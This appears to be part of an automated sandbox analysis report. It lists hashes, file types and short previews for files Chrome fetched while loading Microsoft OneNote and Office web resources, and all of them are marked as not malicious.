                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.875
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:011B17B116126E6E0C4A9B0DE9145805
                                                                                      SHA1:DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
                                                                                      SHA-256:3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
                                                                                      SHA-512:BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnVIrYFwz1PqBIFDdFbUVI=?alt=proto
                                                                                      Preview:CgkKBw3RW1FSGgA=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 31 x 70, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):61
                                                                                      Entropy (8bit):4.068159130770306
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:C9CA61D710AD4C8975E02BF24014F209
                                                                                      SHA1:BEAB3DB40B43D03F851D9CEF6D76117BB2111C73
                                                                                      SHA-256:99D4A35DCD60312F894ED6AD05ACAB97E030D27CD96062E41FDF2C1372223839
                                                                                      SHA-512:F15D54B74C68A61F1A28072F9B232C3F5C5A173E9F9E6549801261C0342E448AF3E013A895E3F290650BFB39D2F771E1973A9058255B398430875B113E346B34
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:.PNG........IHDR.......F......M.Q....IDAT.....$.....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (47531)
                                                                                      Category:dropped
                                                                                      Size (bytes):47532
                                                                                      Entropy (8bit):5.399631966931825
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:808A57CAE0B6FEE71F46EFDDED44B348
                                                                                      SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                                      SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                                      SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):1115
                                                                                      Entropy (8bit):7.474905425501729
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:084E7612635DFCF69A16255B41E70CAA
                                                                                      SHA1:0D9721AA70B01487D3340B864C0BD49FB1D95206
                                                                                      SHA-256:7B389747818635BCA6FE76F5E3226EDA36AF53D8F27526796BC975EBD440A395
                                                                                      SHA-512:A0104DBB40429BCA5F54061CE6D36A695283D883CE1B732CA87A30743234D29BEBA07A0100DE0DE0B274A70C8C7C289574F6343DF16C3E4C7B6453F60E8737B9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:.PNG........IHDR...`...`......w8....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.k.A.....@ .6.* ..H...R....V....l.! X..Z..Z..... X... .. .{.^fw...{.fv..70.~..|........ .. .. .. .. .. .. .. .. .. .. ..3.8.1q....(.&.....B.o.."w..Y.....]......~0N0....]..z....|.n.*......._..O...9..8@..K./..%..[..LQ.rm:.H.>...-..;,...9.G.n....`.{..-.F...'.?...y..]H..o{y..#.....]..x|...K.(x|p~.....r..R..~\.2.Y...f.Q..i...o...r.........Gc..Bp.Ol..\(...~.T...,....j.O.(e......j(e. ...Z....Rf......j(e. ...Z....Rf......j(e.....D.,Y.....~..n.[.........PA....]....0.mK...sE.........J~}z[.!n...RV|.#.......7s.......)B.e;j2.........tX..k.....o.V....j.k3*A........9..?R....Z....5t..j....f.Z.....E.L....J..7.}Uk.......H..i.Z...1...x$....]<I.......#ixw..h.h.h.a.4....9.&.v.....2i..D..l...'.-.+.._...eLZ...M..x..1%.g....'A..X.....jkK.^W.}.m...T....|...._.^.[..~u'...mco.8...nT....d.m.I.b..M.4...s.U.;Yu...k.1|..93a..(M..2..U......B..S..O...........c.......?)....iz.D...T.D!....R
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65526), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):267969
                                                                                      Entropy (8bit):5.853913548046937
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A07BBD93F7642473051CB1CF69C08472
                                                                                      SHA1:E52DD5ECC98629978B277B7A41326AD1B6BCD75F
                                                                                      SHA-256:1C6285973A69887718A02AC335C5119F5B591F41F262C99A59C680D7F5D17700
                                                                                      SHA-512:B740B0C9BDB351F68D4506912E262BCB6B8309F217F20BE5101F2A4D9463EEF29B1E8B2550F1DDD5AF46E91F90BA824A327E39712CD97FECCDAC916A9B9D449E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:function _define_property(e,n,t){return n in e?Object.defineProperty(e,n,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[n]=t,e}function _object_spread(e){for(var n=1;n<arguments.length;n++){var t=null!=arguments[n]?arguments[n]:{},i=Object.keys(t);"function"==typeof Object.getOwnPropertySymbols&&(i=i.concat(Object.getOwnPropertySymbols(t).filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})))),i.forEach((function(n){_define_property(e,n,t[n])}))}return e}function ownKeys(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);n&&(i=i.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),t.push.apply(t,i)}return t}function _object_spread_props(e,n){return n=null!=n?n:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):ownKeys(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))})),e}(globalThis.onenote
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):76571
                                                                                      Entropy (8bit):5.364259301211758
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4DE42314D6EDDA70DF9779762ACC12B8
                                                                                      SHA1:2AF63137ABC68C0910107F8598B7DE48FD5BBD9C
                                                                                      SHA-256:7E86DF2AC06E3524CB7BC6F0B8EB07565BA6D103EAF3CF1A30AC4C78F11A4EAA
                                                                                      SHA-512:4465A7B79288AC5B75B4B21DDE3EA774F94AC209DDADFF99DA7741ED841C739C1F82DAEB550DC707A986FFFED8B9B84F45CA7705F40244A993D0CE34BD65B02B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.FloodgateDynamicCampaign=t():e.FloodgateDynamicCampaign=t()}(self,(function(){return function(){var e={7222:function(e,t,n){"use strict";var r=this&&this.__createBinding||(Object.create?function(e,t,n,r){void 0===r&&(r=n),Object.defineProperty(e,r,{enumerable:!0,get:function(){return t[n]}})}:function(e,t,n,r){void 0===r&&(r=n),e[r]=t[n]}),i=this&&this.__exportStar||function(e,t){for(var n in e)"default"===n||Object.prototype.hasOwnProperty.call(t,n)||r(t,e,n)};Object.defineProperty(t,"__esModule",{value:!0}),t.IFloodgateHostPlatform=t.GovernedChannelType=t.ICampaignDefinitions=t.Api=void 0,i(n(7560),t),t.Api=n(7560),i(n(2783),t),i(n(8262),t),i(n(234),t);var o=n(9556);Object.defineProperty(t,"ICampaignDefinitions",{enumerable:!0,get:function(){return o.ICampaignDefinitions}});var s=n(8445);Object.defineProperty(t,"Govern
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (59425)
                                                                                      Category:downloaded
                                                                                      Size (bytes):64758
                                                                                      Entropy (8bit):5.27301523819275
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5238C6C5C1CBD7F3EB1095E46AD72D30
                                                                                      SHA1:DAD44C1B0E5F936A92771EFD231A20D0D9C79D41
                                                                                      SHA-256:73AF98C00BFBC6937101E8E207DCDD7F7564FAB05F844FBE31011C9913B17284
                                                                                      SHA-512:BEA24037905D288064C85922CF2D347C4174BD7AC85A49BB3D997284B7D9D0F56CC0BA723D2C56EB40A304A6210F67042432F9F353E024C01D13514DAA13158B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://res-1.cdn.office.net/files/sp-client/odsp.knockout/odsp.knockout.lib-447adea9.js
                                                                                      Preview:/*! For license information please see odsp.knockout.lib-447adea9.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.knockout.lib"],{"knockout-projections-lib":function(e,t,n){var a,i,r;!function(o){"use strict";function s(e,t,n,a,i,r,o){this.inputItem=t,this.stateArrayIndex=n,this.mappingOptions=i,this.arrayOfState=r,this.outputObservableArray=o,this.outputArray=this.outputObservableArray.peek(),this.isIncluded=null,this.suppressNotification=!1,this.outputArrayIndex=e.observable(a),this.disposeFuncFromMostRecentMapping=null,this.mappedValueComputed=e.computed(this.mappingEvaluator,this),this.mappedValueComputed.subscribe(this.onMappingResultChanged,this),this.previousMappedValue=this.mappedValueComputed.peek()}function c(e,t){if(!e)return null;switch(e.status){case"added":return e.index;case"deleted":return e.index+t;default:throw new Error("Unknown diff status: "+e.status)}}function d(e,t,n,a,i,r,o,c,d){var l="number"==typeof t.moved,u=l?n[t.move
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):9258
                                                                                      Entropy (8bit):5.806838074326134
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5FBC6BB137EA2316DEFE300913A950DF
                                                                                      SHA1:29464B148AE54621A4AAD4F7742A2A05BE6517E3
                                                                                      SHA-256:82553839D3ECC08D5F9DDF58F9F466B88BFC614F9613DB9525B0E7037BF6843C
                                                                                      SHA-512:D0E0EB529A240E5ED9F24E7F34AA86AB60734285596B531B36623D56867375523F6BB4CD32D4FE906572EBED129A0595DE315B5B6DD9F46AEE5342048352C5E7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0".. xmlns:ov="http://schemas.microsoft.com/office/taskpaneappversionoverrides" xsi:type="TaskPaneApp">.. <Id>54fe4e50-e89c-412b-a034-143b547f9c5d</Id>.. <Version>1.0.0.0</Version>.. <ProviderName>Microsoft</ProviderName>.. <DefaultLocale>en-US</DefaultLocale>.. <DisplayName DefaultValue="Meeting Details">.. <Override Locale="af-ZA" Value="Vergaderingbesonderhede" />.. <Override Locale="am-ET" Value="..... ....." />.. <Override Locale="ar-SA" Value="...... ........" />.. <Override Locale="as-IN" Value="...... ....-....." />.. <Override Locale="az-Latn-AZ" Value="Toplant. T.f.rr.atlar." />.. <Override Locale="be-BY" Value="..........
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (1917), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):1917
                                                                                      Entropy (8bit):4.857442421785386
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:FFC175D47F55E17139466B8D5F7B5597
                                                                                      SHA1:F179CDF25E0F3F02E6A7506628136EC2BC61EB31
                                                                                      SHA-256:038A2421C537F9A7FEFA0CBB8FD7A907D53952B424870ACC7939D6A3BCBB7B14
                                                                                      SHA-512:04BF06DD8E059A8D0D4936947A36D2FF7C8258191B9FA27505894E5411E8D19B3470F16D492A0D6D6BDF4740B156C0D992BE6388BA203897416E1C7FB6739D1C
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/1033/onenote-whatsnew-strings.min.js
                                                                                      Preview:var OnenoteWhatsnewStrings={WhatsNewDialogTitle:"What's New",GotItButton:"Got it!",ImmersiveReader:"The new Immersive Reader provides students with advanced tools to boost reading skills.",Ink:"Handwrite your notes, annotate documents, or sketch out your next big idea with new drawing tools.",NewNotebook:"You can now create notebooks in OneNote Online.",DragHandles:"Use drag handles to easily move text, reorder a list, swap table rows, and re-position images.",SyncUX:"Click the Page Sync Status button for more information about the sync status of the current page.",NotesFeed:"Open the Feed pane for easy access to your OneNote pages, Samsung notes, and sticky notes.",TwoPaneNavigation:"You can hide the navigation pane to focus on the current page or show the navigation pane to switch between your pages, sections, and notebooks.",ReactMLR:"Expand the ribbon to easily find OneNote commands, or collapse it again to maximize your note-taking space.",LearnMoreLinkText:"Learn More",CanvasZoom
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):80
                                                                                      Entropy (8bit):4.773010557409425
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:FF55249D55143D5EB2DF396FA8A34EE8
                                                                                      SHA1:D2B08C91DD9FCC8D49BAE85476308230D0BC591F
                                                                                      SHA-256:216A9426D94326E483B2C11154DE2E303385366841111A4A3DAD5590FF89F0BC
                                                                                      SHA-512:8C1608B6F69312D5BE76DFDBF4E762BA9B50CDE6BBDECA98274F965764F54465CA336EDD6DC7D76996D3DAEC4CB1D59FE5CFEB3B9EE1820E2771879D460A2DD5
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSHgn7cCTXtDLBNRIFDYmyVeUSBQ3Y2OCyEgUNdSxg6xIeCVmkfESbsDGsEgUNibJV5RIFDdjY4LISBQ11LGDr?alt=proto
                                                                                      Preview:ChsKBw2JslXlGgAKBw3Y2OCyGgAKBw11LGDrGgAKGwoHDYmyVeUaAAoHDdjY4LIaAAoHDXUsYOsaAA==
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):969
                                                                                      Entropy (8bit):5.171349633572766
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:5E6EDC73470FF3E746BC8BDAC6FB38B2
                                                                                      SHA1:7DFA441D001FE0B50A5F6ED6102479662D2497DF
                                                                                      SHA-256:71344C4AACBC26401DD2CFDCDB7C16625B423B4E710A0030A65D90B7E16F602D
                                                                                      SHA-512:F3186C5204BAE1523433CDB852732390E02864AE37CF0E39175A369E712D6101D6486C1B3B0BE031D1A3072963C251BC7F251048D172FF71081DF92A79C8132D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0".. xmlns:contentappor="http://schemas.microsoft.com/office/contentappversionoverrides".. xsi:type="ContentApp">.... <Id>bf3a711e-f669-4fd5-8d73-100223695f2a</Id>.. <Version>1.0.0.4</Version>.. <ProviderName>lijia</ProviderName>.. <DefaultLocale>en-US</DefaultLocale>.. The display name of your add-in. Used on the store and various placed of the Office UI such as the add-ins dialog -->.. <DisplayName DefaultValue="Office first party apps" />.. <Description DefaultValue="Office first party apps" />.... <Hosts>.. <Host Name="Document"/>.. </Hosts>.... <DefaultSettings>.. <SourceLocation DefaultValue="index.html" />.. </DefaultSettings>.... <Permissions>ReadWriteDocument</Permissions>..</OfficeApp>
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.220736522823314
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BCB0C4305749B10C7E9F428F8199CAF5
                                                                                      SHA1:B0AFC5BE5ABE6F91286C5F15784EC25FB318BADF
                                                                                      SHA-256:996A3022BDB1C69A264B5E164E4596169D81A91DC6114F7B971FBCD2A218E69C
                                                                                      SHA-512:B2D3DD04BB38314E91A20C0C67C7DD8B01F72EEF52464EECD5C876C7F932527AEF65E9FF434B8CC7E7B61CB8CD25DD8228C3B38FA895E289CB70717B1842419E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<OfficeApp xmlns="http://schemas.microsoft.com/office/appforoffice/1.1".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. xmlns:bt="http://schemas.microsoft.com/office/officeappbasictypes/1.0".. xmlns:contentappor="http://schemas.microsoft.com/office/contentappversionoverrides".. xsi:type="ContentApp">.... <Id>9202f6f9-8fe3-4cf8-9cbd-384c940fe419</Id>.. <Version>1.0.0.0</Version>.. <ProviderName>kotai</ProviderName>.. <DefaultLocale>en-US</DefaultLocale>.. The display name of your add-in. Used on the store and various placed of the Office UI such as the add-ins dialog -->.. <DisplayName DefaultValue="SDX SSO Web App" />.. <Description DefaultValue="SDX SSO Web App" />.. Icon for your add-in. Used on installation screens and the add-ins dialog -->.. <IconUrl DefaultValue="assets/icon-32.png"/>.... <Hosts>.. <Host Name="Document"/>.. <Host Name="Notebook"/>.. <Host Name="Presentation"/>.. <Host Name="Workb
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (58562)
                                                                                      Category:dropped
                                                                                      Size (bytes):264504
                                                                                      Entropy (8bit):5.328867224331583
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:E978BE49E42EDD7F2EDFC219B7607279
                                                                                      SHA1:1BBC808263DC64117ADAEDF0E265D35728917DD5
                                                                                      SHA-256:7634B978111B5E70BF0CB418D76059674EE3D5ADD569F69406F509AD056367C7
                                                                                      SHA-512:03A0A58CA0FAEB638E9A0120AF852750D5DDB4B4A100D7AA17A2F7D5DC703C9FD03F7A8DF1DA87F5D05FC2813A139D2FE5EFE68D13F1FA9177ED923603DEF350
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:/*! For license information please see 16.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[16],{712:(e,t,n)=>{"use strict";var a;n.d(t,{a:()=>a,b:()=>i}),function(e){e[e.CRITICAL=1]="CRITICAL",e[e.WARNING=2]="WARNING"}(a||(a={}));var i={BrowserDoesNotSupportLocalStorage:0,BrowserCannotReadLocalStorage:1,BrowserCannotReadSessionStorage:2,BrowserCannotWriteLocalStorage:3,BrowserCannotWriteSessionStorage:4,BrowserFailedRemovalFromLocalStorage:5,BrowserFailedRemovalFromSessionStorage:6,CannotSendEmptyTelemetry:7,ClientPerformanceMathError:8,ErrorParsingAISessionCookie:9,ErrorPVCalc:10,ExceptionWhileLoggingError:11,FailedAddingTelemetryToBuffer:12,FailedMonitorAjaxAbort:13,FailedMonitorAjaxDur:14,FailedMonitorAjaxOpen:15,FailedMonitorAjaxRSC:16,FailedMonitorAjaxSend:17,FailedMonitorAjaxGetCorrelationHeader:18,FailedToAddHandlerForOnBeforeUnload:19,FailedToSendQueuedTelemetry:20,FailedToReportDataLoss:21,FlushFailed:22,MessageLimitPerPVExceeded:23,MissingReq
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (56385)
                                                                                      Category:dropped
                                                                                      Size (bytes):203723
                                                                                      Entropy (8bit):5.091010803843199
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:BC553108CB200A9A9036DD8FC379767F
                                                                                      SHA1:F5C8EA36367061664B738BC1C46C8192E3C8B97A
                                                                                      SHA-256:A8A93A5AD7BFEBE0381A319F2681457CB386F9B645C594FB443640677F5857B5
                                                                                      SHA-512:7FDF388E327C20B2227C63B7F73A0D09A956B5A94895E730AFC7139EE8CDFD165DF13C300B6C2FE76C439420A022446E55DC459C41349E1EBBCFDA7023D99422
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:var CommonStrings={qpsPloc_Name:"Pseudo",qpsPloca_Name:"Pseudo (Pseudo Asia)",qpsPlocm_Name:"Pseudo (Pseudo Mirrored)",afrikaans:"Afrikaans",albanian:"Albanian",alsatian:"Alsatian",amharic:"Amharic",arabic:"Arabic",arabic_Algeria:"Arabic (Algeria)",arabic_Bahrain:"Arabic (Bahrain)",arabic_Egypt:"Arabic (Egypt)",arabic_Iraq:"Arabic (Iraq)",arabic_Jordan:"Arabic (Jordan)",arabic_Kuwait:"Arabic (Kuwait)",arabic_Lebanon:"Arabic (Lebanon)",arabic_Libya:"Arabic (Libya)",arabic_Morocco:"Arabic (Morocco)",arabic_Oman:"Arabic (Oman)",arabic_Qatar:"Arabic (Qatar)",arabic_Saudi_Arabia:"Arabic (Saudi Arabia)",arabic_Syria:"Arabic (Syria)",arabic_Tunisia:"Arabic (Tunisia)",arabic_UAE:"Arabic (U.A.E.)",arabic_Yemen:"Arabic (Yemen)",armenian:"Armenian",assamese:"Assamese",azerbaijani:"Azerbaijani",azerbaijani_Cyrillic:"Azerbaijani (Cyrillic)",azerbaijani_Latin:"Azerbaijani (Latin)",bangla_Bangladesh:"Bangla (Bangladesh)",bangla_India:"Bangla (India)",bashkir:"Bashkir",basque:"Basque",belarusian:"Bela
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (64762), with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):808183
                                                                                      Entropy (8bit):5.248533367549633
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:3B3F77A1F2990107C99E7788B6991302
                                                                                      SHA1:B81E8B10377BC751AED6715856AF401F2D88234A
                                                                                      SHA-256:C5AF99636CFE83E04A749B90DA4D4F7D75B8E8E2D43B29A7258F578735C5C34E
                                                                                      SHA-512:57EE859510098043A40F21D30E78E9CC4A3ECA09454FD5C8A78071F172CA7588EDD61ABB6BBAE3BE224BEA10EBF8ACAB5858923F295D59652EAFB99823323C59
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://appsforoffice.microsoft.com/lib/1.1/hosted/onenote-web-16.00.js
                                                                                      Preview:/*...Copyright (c) Microsoft Corporation. All rights reserved...*/..../*...Your use of this file is governed by the license terms for the Microsoft Office JavaScript (Office.js) API library: https://github.com/OfficeDev/office-js/blob/release/LICENSE.md..*/..../*..* @overview es6-promise - a tiny implementation of Promises/A+...* @copyright Copyright (c) 2014 Yehuda Katz, Tom Dale, Stefan Penner and contributors (Conversion to ES6 API by Jake Archibald)..* @license Licensed under MIT license..* See https://raw.githubusercontent.com/jakearchibald/es6-promise/master/LICENSE..* @version 2.3.0..*/......// Sources:..// osfweb: 16.0\16.0.18214.15000..// runtime: 16.0\16.0.18214.15000..// core: 16.0\16.0.18214.15000..// host: 16.0\16.0.18214.15000........var OfficeExt,__extends=this&&this.__extends||function(){var e=function(t,n){return(e=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)t.hasOwnProperty(n)&&(e[n]
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):312480
                                                                                      Entropy (8bit):5.467940265974621
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:65B80C88DE560F779A84639D0F9AC31B
                                                                                      SHA1:9B982BFE1677E45A60651F369656C390FE15D51A
                                                                                      SHA-256:C27EAC3A4384958AD7787D0C4CA7841DA0B911814C8D023C345D7C3096A404CB
                                                                                      SHA-512:E718786CAFB587CB8BA39555D94AE73BF4EB7BF1CCA56BB7B019D0AD8842B90FCA952F2CEDB1CD39327CF52F5893F88FF0C0892E7B5EF25E8E993DDD7A8665E7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://wise.public.cdn.office.net/wise/owl/owl.onenote.slim.08a39cef801bdfa43370.js
                                                                                      Preview:var Microsoft;!function(){var t,e,i,n,o={4267:function(t,e,i){var n,o=function(){var t=String.fromCharCode,e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",n={};function o(t,e){if(!n[t]){n[t]={};for(var i=0;i<t.length;i++)n[t][t.charAt(i)]=i}return n[t][e]}var s={compressToBase64:function(t){if(null==t)return"";var i=s.H(t,6,(function(t){return e.charAt(t)}));switch(i.length%4){default:case 0:return i;case 1:return i+"===";case 2:return i+"==";case 3:return i+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:s.A(t.length,32,(function(i){return o(e,t.charAt(i))}))},compressToUTF16:function(e){return null==e?"":s.H(e,15,(function(e){return t(e+32)}))+" "},decompressFromUTF16:function(t){return null==t?"":""==t?null:s.A(t.length,16384,(function(e){return t.charCodeAt(e)-32}))},compressToUint8Array:function(t){for(var e=s.compress(t),i=new Uint8Array(2*e.length),n=0,o=e.length;n<o;n
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (1837)
                                                                                      Category:downloaded
                                                                                      Size (bytes):1882
                                                                                      Entropy (8bit):5.245255266902916
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4407169B6C6BE1315CB8BBCF664D6C13
                                                                                      SHA1:D3930B118CACB9CB54F380896499A627D43A12D2
                                                                                      SHA-256:805C4A9707CDA2C8FAB9D20C477C14CE783D37B739809A5601860465036549F2
                                                                                      SHA-512:3D9296D19E19E11DB09A66B30D8E921CBBAAB4A4F8BA1B69E6B8A02D00D6D7EB4AE78A5E745472F4D3A9468EA236AE7232A6C8C32407C39EDD3F8F4C73C8CDC5
                                                                                      Malicious:false
                                                                                      Reputation:unknown
